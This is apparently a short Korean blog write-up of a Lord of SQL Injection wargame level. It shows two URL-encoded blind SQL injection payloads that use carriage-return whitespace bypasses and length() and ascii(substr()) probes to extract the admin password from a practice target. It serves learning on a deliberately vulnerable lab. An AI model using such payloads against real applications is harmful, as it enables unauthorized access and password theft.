이것도 실제 pw 와 입력한 pw가 맞아야 풀리는 문제이기에 블라인드 인젝션을 이용하였다.
먼저 길이부터 파악했다.
?pw=1234%27%0d||id=%27admin%27%20%26%26%20length(pw)=8%0d--%20-
스크립트를 랩실에 있고 현재는 집에 있어서 걍 저걸로 올림 ㅎㅎ;
?pw=1234%27%0d||%0did=%27admin%27%0d%26%26%0dascii(substr(pw,1,1))%3E0%0d--%20-
이 또한 스크립트가 랩실에 있다 ㅎ
아무튼 하나하나 뽑아서 풀었다.
'0x20 Security > 0x25 Write-Ups' 카테고리의 다른 글
[LOS1] vampire (0) | 2018.09.22 |
---|---|
[LOS1] troll (0) | 2018.09.22 |
[LOS1] darkelf (0) | 2018.09.22 |
[LOS1] wolfman (0) | 2018.09.22 |
[LOS1] orc (0) | 2018.09.22 |